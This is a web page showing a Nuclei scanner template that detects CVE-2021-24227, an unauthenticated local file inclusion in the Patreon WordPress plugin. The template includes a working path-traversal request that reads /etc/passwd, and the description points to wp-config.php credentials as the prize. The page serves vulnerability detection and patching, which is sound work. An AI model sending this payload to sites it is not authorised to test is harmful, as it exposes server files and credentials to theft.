Skip to content

Patreon WordPress <1.7.0 - Unauthenticated Local File Inclusion

ID: CVE-2021-24227

Severity: high

Author: theamanrawat

Tags: cve,cve2021,wordpress,patreon-connect,unauth,lfi,patreon,wp,wpscan

Patreon WordPress before version 1.7.0 is vulnerable to unauthenticated local file inclusion that could be abused by anyone visiting the site. Exploitation by an attacker could leak important internal files like wp-config.php, which contains database credentials and cryptographic keys used in the generation of nonces and cookies.

id: CVE-2021-24227
info:
name: Patreon WordPress <1.7.0 - Unauthenticated Local File Inclusion
author: theamanrawat
severity: high
description: Patreon WordPress before version 1.7.0 is vulnerable to unauthenticated local file inclusion that could be abused by anyone visiting the site. Exploitation by an attacker could leak important internal files like wp-config.php, which contains database credentials and cryptographic keys used in the generation of nonces and cookies.
impact: |
An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to further compromise of the system.
remediation: |
Upgrade to Patreon WordPress plugin version 1.7.0 or later to mitigate this vulnerability.
reference:
- https://wpscan.com/vulnerability/f62df02d-7678-440f-84a1-ddbf09364016
- https://wordpress.org/plugins/patreon-connect/
- https://jetpack.com/2021/03/26/vulnerabilities-found-in-patreon-wordpress-plugin/
- https://nvd.nist.gov/vuln/detail/CVE-2021-24227
- https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-24227
cwe-id: CWE-200
epss-score: 0.02607
epss-percentile: 0.90292
cpe: cpe:2.3:a:patreon:patreon_wordpress:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
vendor: patreon
product: patreon_wordpress
framework: wordpress
tags: cve,cve2021,wordpress,patreon-connect,unauth,lfi,patreon,wp,wpscan
http:
- method: GET
path:
- "{{BaseURL}}/?patron_only_image=../../../../../../../../../../etc/passwd&patreon_action=serve_patron_only_image"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
# digest: 490a004630440220753415e68c12fbf35f03a5cee7ba85e74cadf6310267701891009a4309ce58a6022018b1573775281ac01b32983134799dc405d02243cfbb766b3ac710045c188caa:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-24227.yaml"

View on Github